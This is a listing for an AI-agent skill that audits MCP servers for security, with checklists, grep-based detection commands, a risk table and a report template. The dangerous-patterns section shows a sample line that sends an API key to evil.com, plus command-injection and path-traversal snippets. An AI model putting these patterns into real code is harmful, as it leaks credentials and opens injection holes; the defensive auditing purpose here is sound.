🎁 Get the FREE AI Skills Starter Guide β€” Subscribe β†’
BytesAgainBytesAgain
πŸ¦€ ClawHub

Skill Mcp Security Audit

by @aptratcn

Perform a security audit of MCP servers to detect data exfiltration, command injection, permission escalation, and supply chain vulnerabilities before use.

Versionv1.1.0
Downloads400
TERMINAL
clawhub install mcp-security-audit

πŸ“– About This Skill


name: skill-mcp-security-audit description: Security audit for MCP (Model Context Protocol) servers. Detect data exfiltration risks, command injection, permission escalation, and supply chain vulnerabilities before adding MCP servers to your agent. Trigger on: 'audit MCP', 'MCP security', 'check MCP server', 'scan MCP'. metadata: openclaw: requires: {}

MCP Security Audit πŸ”’

> Don't blindly trust MCP servers. Audit them first.

The Problem

MCP (Model Context Protocol) servers give AI agents powerful capabilities - file access, API calls, code execution. But they can also:

  • Exfiltrate data to external servers
  • Execute arbitrary commands on your machine
  • Access files beyond intended scope
  • Chain vulnerabilities for privilege escalation
  • Real incident: CVE-2026-23744 exposed MCP injection vulnerabilities. Supply chain attacks via compromised MCP packages are a growing threat.

    Quick Audit Checklist

    1. Source Verification βœ…

    β–‘ Is this an official/verified package?
    β–‘ Check npm/PyPI download counts and maintainer history
    β–‘ Review recent commits for suspicious changes
    β–‘ Verify package signature if available
    

    2. Network Audit 🌐

    β–‘ List all external URLs/domains the MCP connects to
    β–‘ Check for hardcoded API endpoints
    β–‘ Verify TLS certificate validation is enabled
    β–‘ Flag any data sent to unknown domains
    

    3. File Access Audit πŸ“

    β–‘ What directories can the MCP read/write?
    β–‘ Is access scoped to project directory only?
    β–‘ Check for path traversal vulnerabilities
    β–‘ Flag any access to ~/.ssh, ~/.config, env files
    

    4. Command Execution Audit ⚑

    β–‘ Does the MCP execute shell commands?
    β–‘ Are commands user-controlled or hardcoded?
    β–‘ Check for command injection vectors
    β–‘ Verify sandboxing/isolation if present
    

    5. Permission Scope Audit πŸ”‘

    β–‘ What permissions does the MCP request?
    β–‘ Are permissions minimal (principle of least privilege)?
    β–‘ Check for excessive scope requests
    β–‘ Verify user consent for sensitive operations
    

    6. Dependency Audit πŸ“¦

    β–‘ Run npm audit / pip-audit / cargo audit
    β–‘ Check for known CVEs in dependencies
    β–‘ Flag outdated packages with security fixes
    β–‘ Review transitive dependencies
    

    Audit Commands

    For npm-based MCP servers:

    # Check package.json for suspicious scripts
    cat package.json | jq '.scripts'

    Audit dependencies

    npm audit

    Check for post-install scripts

    cat package.json | jq '.scripts.postinstall, .scripts.preinstall'

    List network calls (requires grep)

    grep -r "fetch\|axios\|http\|https\|ws://" src/ --include="*.js" --include="*.ts"

    For Python MCP servers:

    # Check requirements.txt for suspicious packages
    cat requirements.txt

    Audit dependencies

    pip-audit

    Check for network calls

    grep -r "requests\|urllib\|httpx\|aiohttp" src/ --include="*.py"

    Check for subprocess calls

    grep -r "subprocess\|os.system\|exec\|eval" src/ --include="*.py"

    Risk Scoring

    | Category | Weight | High Risk Indicators | |----------|--------|---------------------| | Network | 30% | Unknown domains, no TLS, data exfil patterns | | File Access | 25% | Home dir access, path traversal, sensitive files | | Command Exec | 25% | Unsanitized input, shell=True, arbitrary commands | | Dependencies | 15% | Known CVEs, unmaintained packages | | Source | 5% | Unverified maintainer, recent ownership change |

    Score β‰₯ 70: High risk - Do not use without review Score 40-69: Medium risk - Use with caution Score < 40: Low risk - Generally safe

    Red Flags 🚩

    Immediately reject MCP servers with:

    1. Obfuscated code - eval(atob('...')) or similar 2. Dynamic code loading - Loading code from remote URLs 3. Environment variable exfil - Sending process.env or os.environ externally 4. Credential harvesting - Asking for passwords/tokens unnecessarily 5. No source code - Binary-only distributions without reproducible builds

    Audit Report Template

    # MCP Security Audit Report

    Server: [name] Version: [version] Audited: [date] Risk Score: [score]/100

    Findings

    Critical

  • [list critical issues]
  • High

  • [list high issues]
  • Medium

  • [list medium issues]
  • Low

  • [list low issues]
  • Recommendations

    1. [recommendation] 2. [recommendation]

    Verdict

    [ ] APPROVED - Safe to use [ ] APPROVED WITH CAUTION - Review recommendations [ ] REJECTED - Too many risks

    Common MCP Security Patterns

    Safe Patterns βœ…

    // Scoped file access
    const allowedDir = path.resolve(process.cwd(), 'data');
    if (!filePath.startsWith(allowedDir)) throw new Error('Access denied');

    // Sanitized commands const allowedCommands = ['git', 'npm', 'node']; if (!allowedCommands.includes(cmd)) throw new Error('Command not allowed');

    // Explicit user consent if (!await askUserConsent('Allow access to X?')) return;

    Dangerous Patterns ❌

    // DON'T: Unrestricted file read
    fs.readFileSync(userInput); // Path traversal!

    // DON'T: Shell injection exec(git ${userBranch}); // Command injection!

    // DON'T: Credential exposure fetch('https://evil.com/steal?token=' + process.env.API_KEY);

    Integration with CI/CD

    Add to your workflow:

    # .github/workflows/mcp-audit.yml
    name: MCP Security Audit
    on: [push, pull_request]

    jobs: audit: runs-on: ubuntu-latest steps: - uses: actions/checkout@v4 - name: Audit MCP servers run: | # Add your audit commands here npm audit # Check for suspicious patterns grep -r "eval\|exec\|process.env" mcp-servers/ && exit 1

    Related Skills

  • prompt-guard - Protect against prompt injection
  • skill-error-recovery - Handle MCP connection failures gracefully
  • token-budget-guard - Monitor MCP token usage
  • References

  • MCP Specification
  • OWASP Top 10 for LLMs
  • CVE-2026-23744

  • Remember: Every MCP server you add expands your agent's attack surface. Audit before you trust.